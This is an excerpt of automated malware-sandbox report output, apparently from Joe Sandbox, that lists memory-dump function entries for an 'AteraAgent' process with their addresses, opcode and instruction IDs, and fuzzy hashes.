                                                                                                                                                                                                                                                                                                • Opcode ID: eeb47370dcb61dce0683cbac4e2afc172b13791d14fdc21d59387b32a84381c2
                                                                                                                                                                                                                                                                                                • Instruction ID: 080661a2df744c4547748f34217ccdea0b4441dbe0b01daf7b2cd14e48d8f668
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eeb47370dcb61dce0683cbac4e2afc172b13791d14fdc21d59387b32a84381c2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0A031D05A0C8BD720EEA9E0003FDF7B4EF4A305F41103DD00CA2290C37A9695CB55
                                                                                                                                                                                                                                                                                                Function 00007FFD9B385038 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 875f15f6b2f07698da9e66227dff2fe5e9668132f8460bbbb62f8aba5d9624ec
                                                                                                                                                                                                                                                                                                • Instruction ID: 8766896ac54644e4b9d53f43e83155215dd8c72ea684c0b915331e0995db66ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 875f15f6b2f07698da9e66227dff2fe5e9668132f8460bbbb62f8aba5d9624ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF01D31F09A2D8FDBA4EE989860BE8B372FB55255F0041B5D01DE3195CE35A9418B41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388691 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 75e191324d4aaea9975794b0f3cb10e2f049cd143d3aa1f67be70c2cdda150e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 31a4bdc99857bb6df906f444d90a608a6d896e98d169cec060050eb6714956dc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75e191324d4aaea9975794b0f3cb10e2f049cd143d3aa1f67be70c2cdda150e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0A930C4AA0E8FC724EEA4E4403FDB2B4FB0A205F41223DD00CA2190C7BA9A94CB85
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388CE8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7f18dce410e4c0a13c2eb425277f00e39bdfb5091f7e933644abc922069b969c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8f110a267e25e35e6b47b475ea313d5aff2f80ab224cf8c210bcbb293d54126f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f18dce410e4c0a13c2eb425277f00e39bdfb5091f7e933644abc922069b969c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0A030C46A0D8FCB24EEA4A4003FCB2B4FB0A205F41223DD00CB2180C379AB98CB25
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A008 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 90c2833f0a9c44c4ed7cfb53cecf356e87dcdfd84cc19b400202e29fae2cb0f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 189f26a258445f62443cf7f956fbf1b718d858eb24c71eb3633c7eb496fb7bdd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90c2833f0a9c44c4ed7cfb53cecf356e87dcdfd84cc19b400202e29fae2cb0f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6E09A03F0E99E4AE5B4E09C28552A84682CBC8A7077A06BAE41DC22A9E8092D4702D0
                                                                                                                                                                                                                                                                                                Function 00007FFD9B591F9C Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 67f6c78042836790eba17300cbb4041b15c3a1342f4775502bef79dbb101d865
                                                                                                                                                                                                                                                                                                • Instruction ID: f1536c9654585815c86853b952456e36dd740283319e3d1d5191e71b6b051e99
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67f6c78042836790eba17300cbb4041b15c3a1342f4775502bef79dbb101d865
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5E0653170981E8FE6E5E74CE4247B4B3E2FF98321B6201B2D00EC3262DE26AD418740
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BC4A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 330e136c6b374bb2ef3786c7809265f131cb6b3b687e16bcba7299c09bba36fa
                                                                                                                                                                                                                                                                                                • Instruction ID: b91676c43418794bca1f83b3e86829e7e54c4fba861add5241eb6d32b5c08a29
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 330e136c6b374bb2ef3786c7809265f131cb6b3b687e16bcba7299c09bba36fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF0D0A5E2591D5BEB94F7989895AAC73B2FF98B50F810064E058E32A2DE396841C701
                                                                                                                                                                                                                                                                                                Function 00007FFD9B389D15 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 94e345b1d9755b2c69af2ca45cfd3ed9f297734a28d24aea9592c11269079b8a
                                                                                                                                                                                                                                                                                                • Instruction ID: f2cee6c052ea0a6ec167b72af5ac6ff8a82c2d0c1597ca0df1c94dbd7b97cf94
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94e345b1d9755b2c69af2ca45cfd3ed9f297734a28d24aea9592c11269079b8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE06801F0FFAC0FE675EAFE5C760607AD2EF4180070967BEC09486692EC2879864282
                                                                                                                                                                                                                                                                                                Function 00007FFD9B388075 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9a39ac1beea741888420294f7c4fd970a3d8d115deff56ebdd6eaeea17a49c7d
                                                                                                                                                                                                                                                                                                • Instruction ID: a68f8532efea258f8f9030281fb538bb225384a087e7edd5fd849502a2654435
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a39ac1beea741888420294f7c4fd970a3d8d115deff56ebdd6eaeea17a49c7d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E0E531E0451C8EDB54EB68D851BECB7B1FF54205F4040BAE01CE3296CB7569818B01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39E9F0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c4455271358e82264c33c1c6128577a479f7b4a187e56e930519e6f8046dfa24
                                                                                                                                                                                                                                                                                                • Instruction ID: 7cd51c582a2e135a939c0cf9ca337b1db7f4ef0d2cd1b1a53bbcd01d616961c9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4455271358e82264c33c1c6128577a479f7b4a187e56e930519e6f8046dfa24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE0C211E06D8A8FDBA8F6AD488154037D0FF5A340F8A00C2D808CB262E00DCBC98312
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394190 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c3e5233665ad26bedf7c0ca4efc17a80ed92c99fc272c51f83206fe5cd65c75a
                                                                                                                                                                                                                                                                                                • Instruction ID: aa282e60ad068ddacb9574078df5740e81a7dbd6ee828bfc46c2fe9543699be4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3e5233665ad26bedf7c0ca4efc17a80ed92c99fc272c51f83206fe5cd65c75a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE01A70A1441D8EEB68EB6888557AC73B0FF94305F00017E900DD3292CE3459028B40